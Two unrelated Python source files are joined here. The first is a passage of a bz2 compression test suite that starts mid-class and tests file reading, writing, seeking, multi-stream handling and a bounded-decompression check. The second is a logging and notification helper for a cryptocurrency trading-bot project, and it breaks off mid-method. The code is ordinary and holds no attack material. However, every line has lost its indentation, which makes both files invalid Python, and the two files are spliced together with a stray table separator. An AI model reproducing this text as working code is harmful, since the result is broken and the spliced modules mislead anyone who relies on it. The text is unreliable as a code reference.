# simply use the bigger test data for all tests.
test_size = 0
BIG_TEXT = bytearray(128*1024)
for fname in glob.glob(os.path.join(os.path.dirname(__file__), '*.py')):
with open(fname, 'rb') as fh:
test_size += fh.readinto(memoryview(BIG_TEXT)[test_size:])
if test_size > 128*1024:
break
BIG_DATA = bz2.compress(BIG_TEXT, compresslevel=1)
def setUp(self):
self.filename = support.TESTFN
def tearDown(self):
if os.path.isfile(self.filename):
os.unlink(self.filename)
class BZ2FileTest(BaseTest):
"Test the BZ2File class."
def createTempFile(self, streams=1, suffix=b""):
with open(self.filename, "wb") as f:
f.write(self.DATA * streams)
f.write(suffix)
def testBadArgs(self):
self.assertRaises(TypeError, BZ2File, 123.456)
self.assertRaises(ValueError, BZ2File, os.devnull, "z")
self.assertRaises(ValueError, BZ2File, os.devnull, "rx")
self.assertRaises(ValueError, BZ2File, os.devnull, "rbt")
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=0)
self.assertRaises(ValueError, BZ2File, os.devnull, compresslevel=10)
def testRead(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
def testReadBadFile(self):
self.createTempFile(streams=0, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertRaises(OSError, bz2f.read)
def testReadMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testReadMonkeyMultiStream(self):
# Test BZ2File.read() on a multi-stream archive where a stream
# boundary coincides with the end of the raw read buffer.
buffer_size = _compression.BUFFER_SIZE
_compression.BUFFER_SIZE = len(self.DATA)
try:
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT * 5)
finally:
_compression.BUFFER_SIZE = buffer_size
def testReadTrailingJunk(self):
self.createTempFile(suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT)
def testReadMultiStreamTrailingJunk(self):
self.createTempFile(streams=5, suffix=self.BAD_DATA)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), self.TEXT * 5)
def testRead0(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(0), b"")
def testReadChunk10(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testReadChunk10MultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
text = b''
while True:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT * 5)
def testRead100(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testPeek(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testReadInto(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
n = 128
b = bytearray(n)
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b, self.TEXT[:n])
n = len(self.TEXT) - n
b = bytearray(len(self.TEXT))
self.assertEqual(bz2f.readinto(b), n)
self.assertEqual(b[:n], self.TEXT[-n:])
def testReadLine(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES:
self.assertEqual(bz2f.readline(), line)
def testReadLineMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
for line in self.TEXT_LINES * 5:
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES)
def testReadLinesMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
self.assertEqual(bz2f.readlines(), self.TEXT_LINES * 5)
def testIterator(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES)
def testIteratorMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
self.assertEqual(list(iter(bz2f)), self.TEXT_LINES * 5)
def testClosedIteratorDeadlock(self):
# Issue #3309: Iteration on a closed BZ2File should release the lock.
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, next, bz2f)
# This call will deadlock if the above call failed to release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testWrite(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
with BZ2File(self.filename, "w") as bz2f:
n = 0
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteNonDefaultCompressLevel(self):
expected = bz2.compress(self.TEXT, compresslevel=5)
with BZ2File(self.filename, "w", compresslevel=5) as bz2f:
bz2f.write(self.TEXT)
with open(self.filename, "rb") as f:
self.assertEqual(f.read(), expected)
def testWriteLines(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
bz2f.writelines(self.TEXT_LINES)
# Issue #1535500: Calling writelines() on a closed BZ2File
# should raise an exception.
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(b"abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(OSError, bz2f.write, b"a")
self.assertRaises(OSError, bz2f.writelines, [b"a"])
def testAppend(self):
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with BZ2File(self.filename, "a") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(ext_decompress(f.read()), self.TEXT * 2)
def testSeekForward(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekForwardAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(len(self.TEXT) + 150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
readto = len(self.TEXT) + 100
while readto > 0:
readto -= len(bz2f.read(readto))
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[100-150:] + self.TEXT)
def testSeekBackwardsFromEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekBackwardsFromEndAcrossStreams(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-1000, 2)
self.assertEqual(bz2f.read(), (self.TEXT * 2)[-1000:])
def testSeekPostEnd(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwice(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testWithoutThreading(self):
module = support.import_fresh_module("bz2", blocked=("threading",))
with module.BZ2File(self.filename, "wb") as f:
f.write(b"abc")
with module.BZ2File(self.filename, "rb") as f:
self.assertEqual(f.read(), b"abc")
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(bytes(int(2e6)), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(bytes(1), decomp.read(1))
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
logging.py | """Cyberjunky's 3Commas bot helpers."""
import json
import logging
import os
import queue
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
import apprise
class NotificationHandler:
"""Notification class."""
def __init__(self, program, enabled=False, notify_urls=None):
self.program = program
self.message = ""
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def queue_notification(self, message):
"""Queue notification messages."""
if self.enabled:
message.encode(encoding = 'UTF-8', errors = 'strict')
self.message += f"{message}\n\n"
def send_notification(self):
"""Send the notification messages if there are any."""
if self.enabled and self.message:
msg = f"[3C Cyber Bot-Helper {self.program}]\n\n" + self.message
self.queue.put((msg, []))
self.message = ""
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7, encoding='utf-8'):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
encoding=encoding
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(
self,
datadir,
program,
notificationhandler,
logstokeep,
debug_enabled,
notify_enabled,
):
"""Logger init."""
self.my_logger = logging.getLogger()
self.datadir = datadir
self.program = program
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
f"%(asctime)s - {program} - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
f"%(asctime)s - {program} - %(levelname)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{self.datadir}/logs"):
os.makedirs(f"{self.datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{self.datadir}/logs/{self.program}.log", backupCount=logstokeep, encoding='utf-8'
)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
self.info(f"3C Cyber Bot-Helper {program}")
self.info("Started on %s" % time.strftime("%A %H:%M:%S %Y-%m-%d"))
if self.notify_enabled:
self.info("Notifications are enabled")
else:
self.info("Notifications are disabled")
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
